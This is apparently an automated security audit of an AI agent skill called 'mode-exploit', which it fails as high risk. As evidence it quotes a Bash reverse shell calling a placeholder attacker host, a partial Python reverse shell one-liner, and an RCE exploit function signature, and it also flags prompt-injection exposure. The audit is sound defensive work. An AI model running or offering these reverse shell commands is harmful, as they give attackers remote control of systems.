mode-exploit
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH (COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION)
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill provides functional code payloads for establishing reverse shells in both Bash and Python environments. These commands are used to gain unauthorized command-line access to remote systems.
  - Evidence (SKILL.md): bash -i >& /dev/tcp/ATTACKER/PORT 0>&1
  - Evidence (SKILL.md): python3 -c 'import socket,subprocess,os;...subprocess.call(["/bin/sh","-i"])'
- REMOTE_CODE_EXECUTION (HIGH): The Python template included in the skill is explicitly designed to facilitate Remote Code Execution (RCE). It allows for arbitrary commands to be passed and executed on a target host.
  - Evidence (SKILL.md): def exploit(target: str, cmd: str = "id")
- PROMPT_INJECTION (LOW): The skill presents a surface for indirect prompt injection by accepting untrusted input for command execution without sanitization.
  - Ingestion points: Python template in SKILL.md (target, cmd arguments).
  - Boundary markers: Absent.
  - Capability inventory: Network operations (requests) and shell execution (subprocess).
  - Sanitization: Absent.
Recommendations
- AI detected serious security threats
Audit Metadata